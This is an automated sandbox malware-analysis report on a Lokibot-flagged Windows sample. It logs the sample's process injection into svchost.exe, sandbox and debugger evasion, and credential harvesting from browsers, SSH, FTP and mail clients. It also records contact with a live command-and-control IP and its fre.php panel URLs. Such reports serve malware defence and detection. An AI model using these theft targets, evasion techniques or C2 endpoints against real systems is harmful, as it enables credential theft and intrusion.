Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

API/Special instruction interceptor: Address: 9B5FAC

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Evaded block: after key decision

graph_0-100837

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-101485

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

API coverage: 4.3 %

Source: C:\Windows\SysWOW64\svchost.exe TID: 6516

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00446CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00446CA9
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_004460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_004460DD
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_004463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_004463F9
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0044EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0044EB60
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0044F56F FindFirstFileW,FindClose,	0_2_0044F56F
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0044F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0044F5FA
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00451B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00451B2F
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00451C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00451C8A
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00451F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00451F94
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	1_2_00403D74

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_0041DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0041DDC0

Source: C:\Windows\SysWOW64\svchost.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: ZsRFRjkt9q.exe, 00000000.00000002.1658952458.0000000000B07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareworkstation.exe
Source: svchost.exe, 00000001.00000002.1705943878.0000000002A00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	API call chain: ExitProcess graph end node			graph_0-100279
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	API call chain: ExitProcess graph end node			graph_0-101135

Source: C:\Windows\SysWOW64\svchost.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_00456AAF BlockInput,

0_2_00456AAF

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_00403D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403D19

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_00433920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_00433920

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_0041E01E LoadLibraryA,GetProcAddress,

0_2_0041E01E

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_009B6218 mov eax, dword ptr fs:[00000030h]	0_2_009B6218
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_009B6278 mov eax, dword ptr fs:[00000030h]	0_2_009B6278
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0093257B mov eax, dword ptr fs:[00000030h]	0_2_0093257B
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_009B4B98 mov eax, dword ptr fs:[00000030h]	0_2_009B4B98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]	1_2_0040317B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00743060 mov eax, dword ptr fs:[00000030h]	1_2_00743060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00743060 mov eax, dword ptr fs:[00000030h]	1_2_00743060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00743060 mov eax, dword ptr fs:[00000030h]	1_2_00743060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00743060 mov eax, dword ptr fs:[00000030h]	1_2_00743060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00744410 mov eax, dword ptr fs:[00000030h]	1_2_00744410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00744410 mov eax, dword ptr fs:[00000030h]	1_2_00744410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00743540 mov eax, dword ptr fs:[00000030h]	1_2_00743540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00743540 mov eax, dword ptr fs:[00000030h]	1_2_00743540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00743540 mov eax, dword ptr fs:[00000030h]	1_2_00743540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00744610 mov eax, dword ptr fs:[00000030h]	1_2_00744610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00744610 mov eax, dword ptr fs:[00000030h]	1_2_00744610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00744610 mov eax, dword ptr fs:[00000030h]	1_2_00744610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00744610 mov eax, dword ptr fs:[00000030h]	1_2_00744610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_007456A0 mov eax, dword ptr fs:[00000030h]	1_2_007456A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_007456A0 mov ecx, dword ptr fs:[00000030h]	1_2_007456A0

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_0043A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_0043A66C

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00428189 SetUnhandledExceptionFilter,	0_2_00428189
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_004281AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004281AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00745848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00745848
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_007433C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	1_2_007433C0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 94.156.177.41 80

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 337008

Jump to behavior

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_0043B106 LogonUserW,

0_2_0043B106

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_00403D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403D19

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_0044411C SendInput,keybd_event,

0_2_0044411C

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_004474E7 mouse_event,

0_2_004474E7

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ZsRFRjkt9q.exe"

Jump to behavior

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

0_2_0043A66C

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_004471FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_004471FA

Source: ZsRFRjkt9q.exe	Binary or memory string: Shell_TrayWnd
Source: ZsRFRjkt9q.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_004265C4 cpuid

0_2_004265C4

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_0045091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_0045091D

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_0047B340 GetUserNameW,

0_2_0047B340

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_00431E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00431E8E

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_0041DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0041DDC0

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZsRFRjkt9q.exe PID: 6336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6512, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000001.00000002.1706217472.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1706020883.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\svchost.exe	Code function: PopPassword		1_2_0040D069
Source: C:\Windows\SysWOW64\svchost.exe	Code function: SmtpPassword		1_2_0040D069

Source: ZsRFRjkt9q.exe	Binary or memory string: WIN_81
Source: ZsRFRjkt9q.exe	Binary or memory string: WIN_XP
Source: ZsRFRjkt9q.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: ZsRFRjkt9q.exe	Binary or memory string: WIN_XPe
Source: ZsRFRjkt9q.exe	Binary or memory string: WIN_VISTA
Source: ZsRFRjkt9q.exe	Binary or memory string: WIN_7
Source: ZsRFRjkt9q.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00458C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00458C4F
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0045923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_0045923B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00746AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	1_2_00746AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00746B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	1_2_00746B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00746BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	1_2_00746BB0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Service Execution	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	3 Windows Service	2 Valid Accounts	2 Obfuscated Files or Information	2 Credentials in Registry	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	117 System Information Discovery	Distributed Component Object Model	21 Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	3 Windows Service	1 Masquerading	LSA Secrets	141 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	2 Valid Accounts	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ZsRFRjkt9q.exe	83%	ReversingLabs	Win32.Trojan.Nymeria
ZsRFRjkt9q.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://94.156.177.41/alpha/five/fre.php	100%	Avira URL Cloud	phishing

Name	Malicious	Antivirus Detection	Reputation
http://94.156.177.41/alpha/five/fre.php	true	Avira URL Cloud: phishing	unknown
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	svchost.exe, svchost.exe, 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.177.41	unknown	Bulgaria		43561	NET1-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583581
Start date and time:	2025-01-03 05:36:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ZsRFRjkt9q.exe renamed because original name is a hash value
Original Sample Name:	7f04a1d1824b3ec895b377a60c065145.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/4@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 53 Number of non-executed functions: 307
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
